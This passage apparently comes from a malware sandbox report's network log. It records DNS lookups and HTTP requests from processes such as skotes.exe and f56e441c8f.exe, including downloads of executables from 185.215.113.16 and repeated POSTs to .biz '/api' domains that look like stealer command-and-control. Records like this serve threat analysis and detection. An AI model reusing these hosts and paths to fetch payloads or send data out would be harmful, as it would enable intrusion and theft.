                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-us
                                  DNS
                                  206.113.215.185.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  206.113.215.185.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-ru
                                  GET
                                  http://185.215.113.16/luma/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /luma/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:02 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1819648
                                  Last-Modified: Fri, 06 Dec 2024 01:42:37 GMT
                                  Connection: keep-alive
                                  ETag: "6752568d-1bc400"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://185.215.113.16/steam/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /steam/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:07 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 5222400
                                  Last-Modified: Fri, 06 Dec 2024 01:42:46 GMT
                                  Connection: keep-alive
                                  ETag: "67525696-4fb000"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://185.215.113.16/well/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /well/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:36 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 967680
                                  Last-Modified: Fri, 06 Dec 2024 01:40:49 GMT
                                  Connection: keep-alive
                                  ETag: "67525621-ec400"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://185.215.113.16/off/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /off/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:39 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 2741760
                                  Last-Modified: Fri, 06 Dec 2024 01:41:15 GMT
                                  Connection: keep-alive
                                  ETag: "6752563b-29d600"
                                  Accept-Ranges: bytes
                                • flag-us
                                  DNS
                                  16.113.215.185.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  16.113.215.185.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  POST
                                  https://atten-supporse.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.165.166:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: atten-supporse.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:06 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=rfof7d1j0pohqh5g9p9b2lslav; expires=Mon, 31-Mar-2025 20:03:45 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Yyb47Po6NokRmMJcGuKC0olBFhPtsQlSF7kZdis5wzgdKRp5t8Ifk3wRazxh2CFyTjySXorssIgP1wtpyUW4j75t7Cip4zY1hdVEmbrUYlu8vrnuMCdqnUnTQZLQqaNmpI0BN0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c7148bd0beb9-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=48469&min_rtt=47137&rtt_var=12330&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3306&recv_bytes=609&delivery_rate=80346&cwnd=253&unsent_bytes=0&cid=0596e63bb273297f&ts=575&x=0"
                                • flag-us
                                  POST
                                  https://se-blurry.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  104.21.81.153:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: se-blurry.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:06 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=qqg05agjcvno3ltkf6q31sdri6; expires=Mon, 31-Mar-2025 20:03:45 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3JpQpXB8Vv1teJu6CBemPrtUYIjskTH0clKlOeqw0gX4TEZGE22%2FZ%2Bzd2YF9ARjHTeHIC%2BO0O23clXOfNvGCRDW0qb%2FRBqbKLYr9DfnBtm8LCIX2%2FMLrRXd%2FncqGDWzb"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c719181363f5-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=63516&min_rtt=59519&rtt_var=19589&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3289&recv_bytes=599&delivery_rate=62260&cwnd=253&unsent_bytes=0&cid=2414351aa7b7f140&ts=363&x=0"
                                • flag-us
                                  POST
                                  https://zinc-sneark.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.136.167:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: zinc-sneark.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=s57crqho0e2ask1pjjm5p08usk; expires=Mon, 31-Mar-2025 20:03:46 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=17fULF%2FkzA2kCvXva05OTxOiT57yJf081Ul4Eu3vXeF%2BGCRLag68sEEwcIqw3%2FzqcBdrhkdA72mTgJei0ddlUKaPGQmCfWrad5NcFx1Gwp%2FgQd%2F4mahnIIOBUe%2FeoJm7lds%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c71e08ce3d88-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=52747&min_rtt=50579&rtt_var=15440&sent=7&recv=7&lost=0&retrans=1&sent_bytes=3554&recv_bytes=603&delivery_rate=76809&cwnd=254&unsent_bytes=0&cid=bcf839cddfe87b72&ts=707&x=0"
                                • flag-us
                                  POST
                                  https://dwell-exclaim.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.153.96:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dwell-exclaim.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:10 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=25s2tpfgqg7f50jidfkvtt7l4m; expires=Mon, 31-Mar-2025 20:03:48 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9juQgyFVaniyVBfekbkp8m5z6ciAHCq%2B6OPw8LTsOJksYVEepoaOm9wePcUb6LPEd1qJsK0pJSuSQ561qmyKugm9lejrSCOCy%2BmbYsg7EwMuK3%2B0O2f28nPqf4ysLVXpd2nsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c7297f1c7783-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=51283&min_rtt=50870&rtt_var=19902&sent=7&recv=6&lost=0&retrans=1&sent_bytes=3562&recv_bytes=607&delivery_rate=75143&cwnd=254&unsent_bytes=0&cid=3d68d811876ba2ce&ts=1694&x=0"
                                • flag-us
                                  DNS
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  Dr.com
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  Dr.com
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  IN A
                                • flag-us
                                  DNS
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  Dr.com
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  IN A
                                • flag-us
                                  POST
                                  https://formy-spill.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.173.74:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: formy-spill.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:14 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=gd9akri4d04hn4lc9pt9oi5efm; expires=Mon, 31-Mar-2025 20:03:51 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5JTHaHAgDX7O1DGr%2Bdt7vUdFjAKnfK4VntsUpiCIn8P0GIQgzZ6DzZsNKp0XCvbXlvHzKN5mo7zzpa7poHg%2F%2Fk4jnpkO9ImrS25ik%2FA4hp5WaWNcQpas9y3wj6mC7acoGH4%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c73cfc2276c3-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=447773&min_rtt=60542&rtt_var=336004&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=65043&cwnd=253&unsent_bytes=0&cid=e48a7cafc9119f60&ts=1711&x=0"
                                • flag-us
                                  DNS
                                  197.87.175.4.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  197.87.175.4.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  18.31.95.13.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  18.31.95.13.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  POST
                                  https://covery-mover.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.206.64:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: covery-mover.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:15 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=i7ts9rlcsl5cvc46h4h6o4q7ql; expires=Mon, 31-Mar-2025 20:03:54 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0zxOtiv5t4%2FwC3%2FbjWhzYdjCdUJcPimGex7TkZtzxR6at2ShlTtWRcAXRj0c74E3%2FQqq6CvlxYU1jEDfUmH6QqAK0uFFEyvLSW4SSaZEMk7uxvs1AVrsr9kzryq6qBjaNkYG"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c7489b1794f6-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=68159&min_rtt=64542&rtt_var=19210&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=605&delivery_rate=54274&cwnd=253&unsent_bytes=0&cid=375a3a97184af602&ts=1800&x=0"
                                • flag-us
                                  POST
                                  https://dare-curbys.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  104.21.43.156:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dare-curbys.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:19 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=ar7e40jal4ap4hfe6vjk0r25gt; expires=Mon, 31-Mar-2025 20:03:58 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FklT6kX6IpbuqkYfGf%2FnNor5JTbrz2leA7HEV6LB2GY2KVv5Qt71kbv4YqS%2Ff6%2BjtdMAda5Y2ibxCxBsPFr0Y1npjd6IbpEcBDnAcdi0TqhT22mhA5j%2BUpb51gOa9eI5%2Bkc%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c7670ee76361-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=51045&min_rtt=50510&rtt_var=11453&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=603&delivery_rate=74998&cwnd=253&unsent_bytes=0&cid=b6c8bcae83ff5ec5&ts=854&x=0"
                                • flag-us
                                  DNS
                                  92.12.20.2.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  92.12.20.2.in-addr.arpa
                                  IN PTR
                                  Response
                                  92.12.20.2.in-addr.arpa
                                  IN PTR
a2-20-12-92.deploy.static.akamaitechnologies.com
                                • flag-us
                                  POST
                                  https://print-vexer.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  104.21.35.246:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: print-vexer.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:21 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=j355d7q304vtrh9veaf59ee7fr; expires=Mon, 31-Mar-2025 20:03:59 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtt3Cr0acSlYgfThSTFl63ngtkPeELzrmoa%2BkUR6aKxuN9MY1bWHAXD0v8dAX6A8n%2BwXFKf%2Fu3ZrACpPZmiIWwXArZkJmWjtnF9IgZpAyw0fg4uvZlApk%2B%2FuDQSsqkfi6r8%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c76d093b955f-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=52171&min_rtt=47196&rtt_var=12766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=78446&cwnd=253&unsent_bytes=0&cid=50ab8f25e199cd1c&ts=1582&x=0"
                                • flag-us
                                  DNS
                                  impend-differ.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  impend-differ.biz
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  steamcommunity.com
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  steamcommunity.com
                                  IN A
                                  Response
                                  steamcommunity.com
                                  IN A
                                  23.214.143.155
                                • flag-gb
                                  GET
                                  https://steamcommunity.com/profiles/76561199724331900
                                  f56e441c8f.exe
                                  Remote address:
                                  23.214.143.155:443
                                  Request
                                  GET /profiles/76561199724331900 HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Host: steamcommunity.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                  Cache-Control: no-cache
                                  Date: Fri, 06 Dec 2024 02:17:22 GMT
                                  Content-Length: 35602
                                  Connection: keep-alive
                                  Set-Cookie: sessionid=1632c0fd992062af2d745b50; Path=/; Secure; SameSite=None
                                  Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 403 Forbidden
                                  Date: Fri, 06 Dec 2024 02:17:22 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Frame-Options: SAMEORIGIN
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jp58DKphGwTlndHSB7cRZcv%2FSkExNX%2F0Ubfj%2BS%2FRp5bzYFLs1jfle9ZSbvtGHuo0RNGTzxyhb7Y2MT%2BVG1UA9qypqrlIu5wIioyZJBQ9991in6bUOhKfEcwj1sGStN13yO0nWTA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c77e897f9496-LHR
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Cookie: __cf_mw_byp=NCOHsuG9ZNw7kyq4oaqwrQOexARIbuBIgpIY7VJNt7c-1733451442-0.0.1.1-/api
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 53
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:24 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=onu03svvi6its1gf3jlisbojho; expires=Mon, 31-Mar-2025 20:04:02 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=st%2BJXnU4a7MnXZViJkklObRMJQAt6SXxSalZi1PIaxs07S45guE4xd43I4kdySOevuBM%2FUeq7vpBjG1XV4BOZurcwxNXW1kMNUrTuZKCeOsLkPdeNBZmHcQlWdrX5MIKsiYIa1Y%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c77f19fa9496-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47515&min_rtt=46913&rtt_var=4900&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8580&recv_bytes=1075&delivery_rate=172069&cwnd=257&unsent_bytes=0&cid=1bcfd0c19b0ba261&ts=1911&x=0"
                                • flag-ru
                                  GET
                                  http://185.215.113.206/
                                  1dd8bdd825.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:35 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-ru
                                  POST
                                  http://185.215.113.206/c4becf79229cb002.php
                                  1dd8bdd825.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  POST /c4becf79229cb002.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFI
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:35 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN A
                                  Response
                                  youtube.com
                                  IN A
                                  216.58.213.14
                                • flag-us
                                  DNS
                                  spocs.getpocket.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  spocs.getpocket.com
                                  IN A
                                  Response
                                  spocs.getpocket.com
                                  IN CNAME
                                  prod.ads.prod.webservices.mozgcp.net
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  spocs.getpocket.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  spocs.getpocket.com
                                  IN A
                                  Response
                                  spocs.getpocket.com
                                  IN CNAME
                                  prod.ads.prod.webservices.mozgcp.net
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  firefox-api-proxy.cdn.mozilla.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-api-proxy.cdn.mozilla.net
                                  IN A
                                  Response
                                  firefox-api-proxy.cdn.mozilla.net
                                  IN CNAME
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  34.149.97.1
                                • flag-gb
                                  GET
                                  https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                  firefox.exe
                                  Remote address:
                                  216.58.213.14:443
                                  Request
                                  GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                                  host: youtube.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  upgrade-insecure-requests: 1
                                  sec-fetch-dest: document
                                  sec-fetch-mode: navigate
                                  sec-fetch-site: none
                                  sec-fetch-user: ?1
                                  te: trailers
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN A
                                  Response
                                  youtube.com
                                  IN A
                                  216.58.213.14
                                • flag-us
                                  GET
                                  https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                                  firefox.exe
                                  Remote address:
                                  34.149.97.1:443
                                  Request
